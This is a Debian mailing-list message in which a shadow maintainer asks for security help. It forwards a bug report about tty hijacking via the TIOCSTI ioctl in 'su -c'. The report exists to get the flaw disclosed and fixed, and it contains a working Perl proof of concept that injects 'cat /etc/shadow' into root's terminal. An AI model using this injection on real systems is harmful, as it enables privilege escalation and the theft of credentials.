tags 628843 help security thanks Security team, I need advice and help here. My co-maintainer for shadow, Nicolas, is more or less MIA, so I'm left nearly alone to maintain shadow. As Nicolas was also upstream, you understand how desperate is my situation..:-)
(maybe this bug will ring a bell for Nicolas, still) My expertise is, as you may expect, way outreached. So, in short, what I need is someone with enough expertise to look at this bug report and help deciding if adopting Redhat's patch is correct (assuming it applies: I'm not sure that RH is using the same "su" than we do). Mail CC'ed to submitter, too, so that Daniel also knows that the only person who answers....needs help..:-) ----- Forwarded message from Daniel Ruoso <dan...@ruoso.com> ----- Date: Wed, 1 Jun 2011 15:24:47 -0400 From: Daniel Ruoso <dan...@ruoso.com> To: Debian Bug Tracking System <sub...@bugs.debian.org> Subject: [Pkg-shadow-devel] Bug#628843: login: tty hijacking possible in "su" via TIOCSTI ioctl Reply-To: Daniel Ruoso <dan...@ruoso.com>, 628...@bugs.debian.org X-CRM114-Status: Good ( pR: 39.0933 ) Package: login Version: 1:4.1.4.2+svn3283-2+squeeze1 Severity: critical After investigating why RedHat have a different behavior regarding "su -c" I found out that there was a patch in RedHat to prevent tty hijacking when using "su -c". What makes the hijacking possible is that "su -c" still gives the command a controlling tty, which means it has ioctl access to /dev/tty. This means it can send things to the tty input buffer, which will be read just after su ends. The original report (with patch) on RedHat (from 2005?!?!?!) is: https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=173008 A very simple exploit follows (Perl code) ____BEGIN_CODE____ #!/usr/bin/perl require "sys/ioctl.ph"; open my $tty_fh, '<', '/dev/tty' or die $!; foreach my $c (split //, 'cat /etc/shadow'.$/) { ioctl($tty_fh, &TIOCSTI, $c); } ____END_CODE____ The scenario is: Root runs a command as a less priviledged user with "su -c", if the user was compromised, the script will be able to run commands as root by injecting keystrokes on the terminal. -- System Information: Debian Release: 6.0.1 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.32-5-686 (SMP w/1 CPU core) Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages login depends on: ii libc6 2.11.2-10 Embedded GNU C Library: Shared lib ii libpam-modules 1.1.1-6.1 Pluggable Authentication Modules f ii libpam-runtime 1.1.1-6.1 Runtime support for the PAM librar ii libpam0g 1.1.1-6.1 Pluggable Authentication Modules l login recommends no packages. login suggests no packages. -- no debconf information _______________________________________________ Pkg-shadow-devel mailing list pkg-shadow-de...@lists.alioth.debian.org http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-shadow-devel ----- End forwarded message ----- --
signature.asc
Description: Digital signature
